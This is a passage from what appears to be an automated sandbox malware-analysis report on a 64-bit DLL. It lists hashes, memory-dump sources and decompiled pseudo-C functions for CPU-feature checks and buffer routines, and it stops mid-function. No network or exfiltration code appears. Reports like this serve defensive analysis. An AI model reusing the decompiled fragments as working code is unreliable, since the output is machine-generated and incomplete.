                                                                                                      • Opcode ID: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                      • Instruction ID: cfe9eacf390d468c13f16f556d0757c07c704974f4e6988c0e8e4883957bcd26
                                                                                                      • Opcode Fuzzy Hash: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
                                                                                                      • Instruction Fuzzy Hash: 95316174529380AFD398DF28D48A81BBBF0FB99314F806E1DF9C68A2A0D774D405CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                      • Instruction ID: 95bb47a97fe7a9d8d529fae77a119aa2dd9a35a31096ffbc611f9293c9fe5b2f
                                                                                                      • Opcode Fuzzy Hash: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
                                                                                                      • Instruction Fuzzy Hash: 2531F17080438E8BDB48CF64C8865DFBFB0FB48358F104A19EC5AA6250D7B89664CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                      • Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
                                                                                                      • Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
                                                                                                      • Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 86%
                                                                                                      			E00007FF87FF87C10AB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                      				intOrPtr _v12;
                                                                                                      				intOrPtr _v16;
                                                                                                      				intOrPtr _v20;
                                                                                                      				void* _t25;
                                                                                                      
                                                                                                      				_t25 = __r8;
                                                                                                      				r8d = 0;
                                                                                                      				 *0x7c17f4f8 = r8d;
                                                                                                      				_t1 = _t25 + 1; // 0x1
                                                                                                      				r9d = _t1;
                                                                                                      				asm("cpuid");
                                                                                                      				_v16 = r9d;
                                                                                                      				_v16 = 0;
                                                                                                      				_v20 = __ebx;
                                                                                                      				_v12 = __edx;
                                                                                                      				if (0 != 0x18001000) goto 0x7c10abb1;
                                                                                                      				asm("xgetbv");
                                                                                                      				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                      				r8d =  *0x7c17f4f8; // 0x1
                                                                                                      				r8d =  ==  ? r9d : r8d;
                                                                                                      				 *0x7c17f4f8 = r8d;
                                                                                                      				 *0x7c17f4fc = r8d;
                                                                                                      				return 0;
                                                                                                      			}







                                                                                                      0x7ff87c10ab50
                                                                                                      0x7ff87c10ab56
                                                                                                      0x7ff87c10ab5b
                                                                                                      0x7ff87c10ab62
                                                                                                      0x7ff87c10ab62
                                                                                                      0x7ff87c10ab69
                                                                                                      0x7ff87c10ab6b
                                                                                                      0x7ff87c10ab73
                                                                                                      0x7ff87c10ab79
                                                                                                      0x7ff87c10ab7d
                                                                                                      0x7ff87c10ab83
                                                                                                      0x7ff87c10ab87
                                                                                                      0x7ff87c10ab91
                                                                                                      0x7ff87c10ab9b
                                                                                                      0x7ff87c10aba6
                                                                                                      0x7ff87c10abaa
                                                                                                      0x7ff87c10abb1
                                                                                                      0x7ff87c10abbf

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                      • Instruction ID: 1b3f01b4472edb7cd36a76d70fc8ebcf8aee06c285abee63c47b5ce76cda80fb
                                                                                                      • Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
                                                                                                      • Instruction Fuzzy Hash: 8BF068727282568BDBA4CF2CE442B2A77D0F7083C0F648079D69D87B04D63CD0A08F24
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 49%
                                                                                                      			E00007FF87FF87C103240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				long long _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _v80;
                                                                                                      				long long _v88;
                                                                                                      				long long _v96;
                                                                                                      				long long _v104;
                                                                                                      				long long _v112;
                                                                                                      				long long _v120;
                                                                                                      				long long _v128;
                                                                                                      				long long _v136;
                                                                                                      				long long _t207;
                                                                                                      				intOrPtr* _t209;
                                                                                                      				intOrPtr _t218;
                                                                                                      				intOrPtr _t221;
                                                                                                      				long long _t223;
                                                                                                      				void* _t225;
                                                                                                      				intOrPtr _t228;
                                                                                                      				long long _t229;
                                                                                                      				void* _t230;
                                                                                                      				intOrPtr _t235;
                                                                                                      				long long _t237;
                                                                                                      				void* _t239;
                                                                                                      				void* _t243;
                                                                                                      				long long _t245;
                                                                                                      				void* _t247;
                                                                                                      				long long _t248;
                                                                                                      				void* _t249;
                                                                                                      				long long _t250;
                                                                                                      				void* _t251;
                                                                                                      				long long _t257;
                                                                                                      
                                                                                                      				_t207 = __rax;
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1021F0(__eflags, __rax, _a8, _a16);
                                                                                                      				E00007FF87FF87C1021F0(__eflags, __rax, _a32, _a40);
                                                                                                      				E00007FF87FF87C102400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                      				_a24 = _t207;
                                                                                                      				E00007FF87FF87C102400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                      				_a48 = _t207;
                                                                                                      				_t209 = 0xffffffff - _a48;
                                                                                                      				_v120 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170(_t209, _a8);
                                                                                                      				_t211 =  *_t209 - _a24;
                                                                                                      				if (_v120 - 0xffffffff > 0) goto 0x7c103315;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170( *_t209 - _a24, _a8);
                                                                                                      				_v136 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170( *_t211 - _a24 - _a16, _a8);
                                                                                                      				_v128 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                      				if ( *0xffffffff - _v128 >= 0) goto 0x7c10338e;
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C1022B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                      				_t218 = _a24;
                                                                                                      				if (_a48 != _t218) goto 0x7c1033ec;
                                                                                                      				E00007FF87FF87C1018D0(_t218, _a32);
                                                                                                      				_v112 = _t218 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t218 + _a40, _a8);
                                                                                                      				E00007FF87FF87C101230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t221 = _a32;
                                                                                                      				if (_a8 == _t221) goto 0x7c1034a2;
                                                                                                      				E00007FF87FF87C1018F0(_t221, _a8);
                                                                                                      				_t223 = _t221 + _a16 + _a24;
                                                                                                      				_v104 = _t223;
                                                                                                      				E00007FF87FF87C1018F0(_t223, _a8);
                                                                                                      				_t225 = _t223 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t225, _v104, _v136);
                                                                                                      				E00007FF87FF87C1018D0(_t225, _a32);
                                                                                                      				_v96 = _t225 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t225 + _a40, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t228 = _a24;
                                                                                                      				if (_a48 - _t228 >= 0) goto 0x7c103558;
                                                                                                      				E00007FF87FF87C1018F0(_t228, _a8);
                                                                                                      				_t229 = _t228 + _a40;
                                                                                                      				_v88 = _t229;
                                                                                                      				E00007FF87FF87C1018F0(_t229, _a8);
                                                                                                      				_t230 = _t229 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t230, _v88, _a48);
                                                                                                      				E00007FF87FF87C1018F0(_t230, _a8);
                                                                                                      				_v80 = _t230 + _a16 + _a24;
                                                                                                      				E00007FF87FF87C1018F0(_t230 + _a16 + _a24, _a8);
                                                                                                      				E00007FF87FF87C101230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t235 = _a16;
                                                                                                      				if (_a40 - _t235 > 0) goto 0x7c10360e;
                                                                                                      				E00007FF87FF87C1018F0(_t235, _a8);
                                                                                                      				_t237 = _t235 + _a16 + _a24;
                                                                                                      				_v72 = _t237;
                                                                                                      				E00007FF87FF87C1018F0(_t237, _a8);
                                                                                                      				_t239 = _t237 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t239, _v72, _v136);
                                                                                                      				E00007FF87FF87C1018F0(_t239, _a8);
                                                                                                      				_v64 = _t239 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t239 + _a40, _a8);
                                                                                                      				E00007FF87FF87C101230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t243 = _a16 + _a24;
                                                                                                      				if (_t243 - _a40 > 0) goto 0x7c1036eb;
                                                                                                      				E00007FF87FF87C1018F0(_t243, _a8);
                                                                                                      				_t245 = _t243 + _a16 + _a24;
                                                                                                      				_v56 = _t245;
                                                                                                      				E00007FF87FF87C1018F0(_t245, _a8);
                                                                                                      				_t247 = _t245 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t247, _v56, _v136);
                                                                                                      				E00007FF87FF87C1018F0(_t247, _a8);
                                                                                                      				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                      				_v48 = _t248;
                                                                                                      				E00007FF87FF87C1018F0(_t248, _a8);
                                                                                                      				_t249 = _t248 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t249, _v48, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				E00007FF87FF87C1018F0(_t249, _a8);
                                                                                                      				_t250 = _t249 + _a40;
                                                                                                      				_v40 = _t250;
                                                                                                      				E00007FF87FF87C1018F0(_t250, _a8);
                                                                                                      				_t251 = _t250 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t251, _v40, _a24);
                                                                                                      				E00007FF87FF87C1018F0(_t251, _a8);
                                                                                                      				_v32 = _t251 + _a16 + _a24;
                                                                                                      				E00007FF87FF87C1018F0(_t251 + _a16 + _a24, _a8);
                                                                                                      				E00007FF87FF87C101230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                      				_t257 = _a48 - _a24;
                                                                                                      				_v24 = _t257;
                                                                                                      				E00007FF87FF87C1018F0(_t257, _a8);
                                                                                                      				_t259 = _t257 + _a40 + _a48;
                                                                                                      				_v16 = _t257 + _a40 + _a48;
                                                                                                      				E00007FF87FF87C1018F0(_t257 + _a40 + _a48, _a8);
                                                                                                      				E00007FF87FF87C101230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                      				return E00007FF87FF87C1023A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                      			}







































                                                                                                      0x7ff87c103240
                                                                                                      0x7ff87c103240
                                                                                                      0x7ff87c103245
                                                                                                      0x7ff87c10324a
                                                                                                      0x7ff87c10324f
                                                                                                      0x7ff87c10326b
                                                                                                      0x7ff87c103280
                                                                                                      0x7ff87c10329d
                                                                                                      0x7ff87c1032a2
                                                                                                      0x7ff87c1032c2
                                                                                                      0x7ff87c1032c7
                                                                                                      0x7ff87c1032d6
                                                                                                      0x7ff87c1032de
                                                                                                      0x7ff87c1032eb
                                                                                                      0x7ff87c1032fb
                                                                                                      0x7ff87c103306
                                                                                                      0x7ff87c103310
                                                                                                      0x7ff87c10331d
                                                                                                      0x7ff87c103338
                                                                                                      0x7ff87c103345
                                                                                                      0x7ff87c10335d
                                                                                                      0x7ff87c10336a
                                                                                                      0x7ff87c103377
                                                                                                      0x7ff87c103379
                                                                                                      0x7ff87c103389
                                                                                                      0x7ff87c10338e
                                                                                                      0x7ff87c10339e
                                                                                                      0x7ff87c1033a8
                                                                                                      0x7ff87c1033b5
                                                                                                      0x7ff87c1033c2
                                                                                                      0x7ff87c1033e2
                                                                                                      0x7ff87c1033e7
                                                                                                      0x7ff87c1033ec
                                                                                                      0x7ff87c1033fc
                                                                                                      0x7ff87c10340a
                                                                                                      0x7ff87c103417
                                                                                                      0x7ff87c10341f
                                                                                                      0x7ff87c10342c
                                                                                                      0x7ff87c103439
                                                                                                      0x7ff87c103451
                                                                                                      0x7ff87c10345e
                                                                                                      0x7ff87c10346b
                                                                                                      0x7ff87c103478
                                                                                                      0x7ff87c103498
                                                                                                      0x7ff87c10349d
                                                                                                      0x7ff87c1034a2
                                                                                                      0x7ff87c1034b2
                                                                                                      0x7ff87c1034c0
                                                                                                      0x7ff87c1034c5
                                                                                                      0x7ff87c1034cd
                                                                                                      0x7ff87c1034da
                                                                                                      0x7ff87c1034df
                                                                                                      0x7ff87c1034fa
                                                                                                      0x7ff87c103507
                                                                                                      0x7ff87c10351c
                                                                                                      0x7ff87c103529
                                                                                                      0x7ff87c10354e
                                                                                                      0x7ff87c103553
                                                                                                      0x7ff87c103558
                                                                                                      0x7ff87c103568
                                                                                                      0x7ff87c103576
                                                                                                      0x7ff87c103583
                                                                                                      0x7ff87c10358b
                                                                                                      0x7ff87c103598
                                                                                                      0x7ff87c1035a5
                                                                                                      0x7ff87c1035bd
                                                                                                      0x7ff87c1035ca
                                                                                                      0x7ff87c1035d7
                                                                                                      0x7ff87c1035e4
                                                                                                      0x7ff87c103604
                                                                                                      0x7ff87c103609
                                                                                                      0x7ff87c103621
                                                                                                      0x7ff87c10362c
                                                                                                      0x7ff87c10363a
                                                                                                      0x7ff87c103647
                                                                                                      0x7ff87c10364f
                                                                                                      0x7ff87c10365c
                                                                                                      0x7ff87c103669
                                                                                                      0x7ff87c103681
                                                                                                      0x7ff87c10368e
                                                                                                      0x7ff87c1036b1
                                                                                                      0x7ff87c1036b4
                                                                                                      0x7ff87c1036c1
                                                                                                      0x7ff87c1036c6
                                                                                                      0x7ff87c1036e1
                                                                                                      0x7ff87c1036e6
                                                                                                      0x7ff87c1036f3
                                                                                                      0x7ff87c1036f8
                                                                                                      0x7ff87c103700
                                                                                                      0x7ff87c103710
                                                                                                      0x7ff87c103715
                                                                                                      0x7ff87c103733
                                                                                                      0x7ff87c103740
                                                                                                      0x7ff87c103755
                                                                                                      0x7ff87c103765
                                                                                                      0x7ff87c10378d
                                                                                                      0x7ff87c1037a5
                                                                                                      0x7ff87c1037a8
                                                                                                      0x7ff87c1037b8
                                                                                                      0x7ff87c1037c5
                                                                                                      0x7ff87c1037cd
                                                                                                      0x7ff87c1037dd
                                                                                                      0x7ff87c10380b
                                                                                                      0x7ff87c103831

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1550686663-0
                                                                                                      • Opcode ID: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
                                                                                                      • Instruction ID: a3a045be634817e72fce190ad7022028dbe7875793d1447939b4a35709884d09
                                                                                                      • Opcode Fuzzy Hash: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
                                                                                                      • Instruction Fuzzy Hash: ADD1A467A2DBC181DA70DB52F4913AAB361FBC97C4F104136EA9D43B6ADF2CD0948B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 48%
                                                                                                      			E00007FF87FF87C102FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				long long _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _t100;
                                                                                                      				intOrPtr* _t102;
                                                                                                      				intOrPtr* _t104;
                                                                                                      				long long _t108;
                                                                                                      				long long _t110;
                                                                                                      				intOrPtr* _t112;
                                                                                                      				intOrPtr _t116;
                                                                                                      				long long _t118;
                                                                                                      
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x7c10303c;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				_t100 = _a32 - __rax;
                                                                                                      				_v64 = _a40;
                                                                                                      				_v72 = _t100;
                                                                                                      				E00007FF87FF87C103240(__edx, E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                      				goto 0x7c103214;
                                                                                                      				E00007FF87FF87C1021F0(E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                      				E00007FF87FF87C102400(E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                      				_a24 = _t100;
                                                                                                      				_t102 = 0xffffffff - _a40;
                                                                                                      				_v40 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170(_t102, _a8);
                                                                                                      				_t104 =  *_t102 - _a24;
                                                                                                      				if (_v40 - 0xffffffff > 0) goto 0x7c1030aa;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t104, _a8);
                                                                                                      				_v56 =  *_t104 - _a24 - _a16;
                                                                                                      				_t108 = _a24;
                                                                                                      				if (_a40 - _t108 >= 0) goto 0x7c103126;
                                                                                                      				E00007FF87FF87C1018F0(_t108, _a8);
                                                                                                      				_t110 = _t108 + _a16 + _a24;
                                                                                                      				_v32 = _t110;
                                                                                                      				E00007FF87FF87C1018F0(_t110, _a8);
                                                                                                      				_t112 = _t110 + _a16 + _a40;
                                                                                                      				E00007FF87FF87C101230(_t112, _v32, _v56);
                                                                                                      				E00007FF87FF87C102170(_t112, _a8);
                                                                                                      				_v48 =  *_t112 + _a40 - _a24;
                                                                                                      				if (_a40 > 0) goto 0x7c103162;
                                                                                                      				if (_a24 <= 0) goto 0x7c10320f;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x7c10320f;
                                                                                                      				_t116 = _a40;
                                                                                                      				if (_a24 - _t116 >= 0) goto 0x7c1031d9;
                                                                                                      				E00007FF87FF87C1018F0(_t116, _a8);
                                                                                                      				_t118 = _t116 + _a16 + _a24;
                                                                                                      				_v24 = _t118;
                                                                                                      				E00007FF87FF87C1018F0(_t118, _a8);
                                                                                                      				_t120 = _t118 + _a16 + _a40;
                                                                                                      				E00007FF87FF87C101230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                      				E00007FF87FF87C1018F0(_t118 + _a16 + _a40, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t120 + _a16, _a32, _a40);
                                                                                                      				return E00007FF87FF87C1023A0(_t120 + _a16, _a8, _v48);
                                                                                                      			}


















                                                                                                      0x7ff87c102fc0
                                                                                                      0x7ff87c102fc5
                                                                                                      0x7ff87c102fca
                                                                                                      0x7ff87c102fcf
                                                                                                      0x7ff87c102fef
                                                                                                      0x7ff87c102ff6
                                                                                                      0x7ff87c103006
                                                                                                      0x7ff87c103011
                                                                                                      0x7ff87c103016
                                                                                                      0x7ff87c103032
                                                                                                      0x7ff87c103037
                                                                                                      0x7ff87c103046
                                                                                                      0x7ff87c10305d
                                                                                                      0x7ff87c103062
                                                                                                      0x7ff87c103071
                                                                                                      0x7ff87c103079
                                                                                                      0x7ff87c103083
                                                                                                      0x7ff87c103093
                                                                                                      0x7ff87c10309e
                                                                                                      0x7ff87c1030a5
                                                                                                      0x7ff87c1030af
                                                                                                      0x7ff87c1030c7
                                                                                                      0x7ff87c1030cc
                                                                                                      0x7ff87c1030dc
                                                                                                      0x7ff87c1030e3
                                                                                                      0x7ff87c1030ed
                                                                                                      0x7ff87c1030f5
                                                                                                      0x7ff87c1030ff
                                                                                                      0x7ff87c103109
                                                                                                      0x7ff87c103121
                                                                                                      0x7ff87c10312b
                                                                                                      0x7ff87c103143
                                                                                                      0x7ff87c103151
                                                                                                      0x7ff87c10315c
                                                                                                      0x7ff87c103162
                                                                                                      0x7ff87c103179
                                                                                                      0x7ff87c10317f
                                                                                                      0x7ff87c10318f
                                                                                                      0x7ff87c103196
                                                                                                      0x7ff87c1031a0
                                                                                                      0x7ff87c1031a8
                                                                                                      0x7ff87c1031b2
                                                                                                      0x7ff87c1031bc
                                                                                                      0x7ff87c1031d4
                                                                                                      0x7ff87c1031de
                                                                                                      0x7ff87c1031fb
                                                                                                      0x7ff87c103218

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C102FF6
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                        • Part of subcall function 00007FF87C103240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C103310
                                                                                                        • Part of subcall function 00007FF87C103240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1033A8
                                                                                                        • Part of subcall function 00007FF87C103240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1033C2
                                                                                                        • Part of subcall function 00007FF87C103240: char_traits.LIBCPMTD ref: 00007FF87C1033E2
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C1030A5
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1030E3
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1030FF
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C103121
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C103196
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1031B2
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1031D4
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1031DE
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1031FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 4284633421-0
                                                                                                      • Opcode ID: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
                                                                                                      • Instruction ID: 99f3f97b886b6f46a01a2084d584e9bf76adf73341b20d2dad25105d88d28756
                                                                                                      • Opcode Fuzzy Hash: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
                                                                                                      • Instruction Fuzzy Hash: D751C067A2CB8182DB60DB69E45136AA3A0FBC57C0F505136EBDD43B6ADF3CD4918B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 40%
                                                                                                      			E00007FF87FF87C10893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                      				void* _v64;
                                                                                                      				intOrPtr _v68;
                                                                                                      				intOrPtr _v72;
                                                                                                      				intOrPtr _v76;
                                                                                                      				intOrPtr _v80;
                                                                                                      				intOrPtr _v84;
                                                                                                      				intOrPtr _v88;
                                                                                                      				intOrPtr _v92;
                                                                                                      				intOrPtr _v96;
                                                                                                      				intOrPtr _v100;
                                                                                                      				intOrPtr _v104;
                                                                                                      				intOrPtr _v108;
                                                                                                      				intOrPtr _v112;
                                                                                                      				intOrPtr _v116;
                                                                                                      				intOrPtr _v120;
                                                                                                      				intOrPtr _v124;
                                                                                                      				intOrPtr _v128;
                                                                                                      				intOrPtr _v132;
                                                                                                      				intOrPtr _v136;
                                                                                                      				intOrPtr _v140;
                                                                                                      				intOrPtr _v144;
                                                                                                      				intOrPtr _v148;
                                                                                                      				intOrPtr _v152;
                                                                                                      				long long _v160;
                                                                                                      				long long _v168;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				void* _t155;
                                                                                                      				void* _t185;
                                                                                                      				signed short _t199;
